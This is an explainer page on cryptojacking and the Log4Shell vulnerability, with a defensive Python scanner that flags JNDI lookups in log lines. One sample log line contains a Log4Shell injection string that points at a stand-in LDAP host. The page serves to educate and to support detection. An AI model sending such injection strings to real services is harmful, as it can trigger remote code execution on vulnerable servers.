Crypto-Jacking

Last Updated on July 30, 2022

Crypto-Jacking (or Cryptojacking) is when hackers make unauthorized use of other people's devices to mine cryptocurrencies. It was most recently exposed by the Log4j bug. The mining is done by siphoning off the energy resources of devices while staying completely hidden; the objective for the miners/hackers is to obtain new tokens without incurring energy costs.

Most of these miners, including Tor2Mine, carry out these campaigns to mine Monero. The altcoin appeals to hackers due to its private and untraceable nature.

Tor2Mine uses Microsoft’s PowerShell scripting language to disable pre-existing malware protection on a server and execute a miner payload, a stealthy piece of malware designed to farm the resources of a system.

Essentially, Log4j provides a functionality called message lookup substitution: when you log a message using Log4j, it looks for segments enclosed in ${ } and replaces those segments with a dynamically retrieved value. One of the systems which Log4j can use to retrieve data is the Java Naming and Directory Interface (JNDI), whose purpose is to allow applications to look up information given a short, portable name. Now, the really terrifying part is that JNDI may contact an LDAP (Lightweight Directory Access Protocol) server, which returns a response serialized as a Java class. The value of that response is extracted by executing the class. And in just three easy steps, you’ve got remote code execution.
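For defenders reviewing logs, the lookup syntax described above can be searched for directly. The following is an added example, not code from Log4j or from this page: it walks each log line for ${ } segments, including nested ones, and reports any that name the JNDI lookup along with the protocol and host it points at. The function names, the sample log lines and the host ldap.example.invalid are constructed for illustration.

```python
from urllib.parse import urlsplit

def lookup_segments(message):
    """Yield the body of every ${...} segment, inner ones first, using a brace stack."""
    stack = []
    i = 0
    while i < len(message):
        if message.startswith("${", i):
            stack.append(i + 2)          # remember where this segment's body starts
            i += 2
        elif message[i] == "}" and stack:
            yield message[stack.pop():i]
            i += 1
        else:
            i += 1

def classify(segment):
    """Split 'prefix:key'; for jndi lookups also extract the URI scheme and host."""
    prefix, sep, key = segment.partition(":")
    finding = {"prefix": prefix.lower() if sep else None,
               "key": key if sep else segment}
    if finding["prefix"] == "jndi":
        uri = urlsplit(key)
        finding["scheme"] = uri.scheme.lower()
        finding["host"] = uri.hostname
    return finding

def scan(lines):
    """Return (line_number, finding) for every JNDI lookup found in the log lines."""
    hits = []
    for number, line in enumerate(lines, 1):
        for segment in lookup_segments(line):
            finding = classify(segment)
            if finding["prefix"] == "jndi":
                hits.append((number, finding))
    return hits

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '2021-12-10 10:01:02 INFO  GET /index.html UA="Mozilla/5.0"',
    '2021-12-10 10:01:05 INFO  runtime=${java:version}',
    '2021-12-10 10:01:09 WARN  login failed user="${jndi:ldap://ldap.example.invalid:1389/a}"',
]

if __name__ == "__main__":
    for number, f in scan(SAMPLE_LOG):
        print(f"line {number}: jndi lookup scheme={f['scheme']} host={f['host']}")
```

The scan matches only a literal jndi prefix, so a clean result is one signal rather than proof that a log is clean; the hosts it does report are candidates for egress blocking and for correlation with outbound connection records.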

Attacks like this have been known to occur since 2016. However, it wasn’t until December 4th, 2021, when Log4j’s maintainer submitted a patch to the project’s repository to restrict which protocols lookups could access, that the world realized that half of all Java applications had just become a ticking time bomb.

Illegal mining has become an established means to criminally obtain digital assets. A recent cyber security report by Google revealed that 86% of compromised Google Cloud accounts are used for illegal cryptocurrency mining.

More Interesting Log4j Exploit Stories

https://log4shell.tools/

https://www.bleepingcomputer.com/news/security/log4j-attackers-switch-to-injecting-monero-miners-via-rmi/

https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html

https://www.zdnet.com/article/ransomware-warning-hackers-are-using-log4j-flaw-as-part-of-their-attacks-warns-microsoft/

https://www.pcmag.com/news/hackers-exploit-log4shell-to-infect-vmware-horizon-servers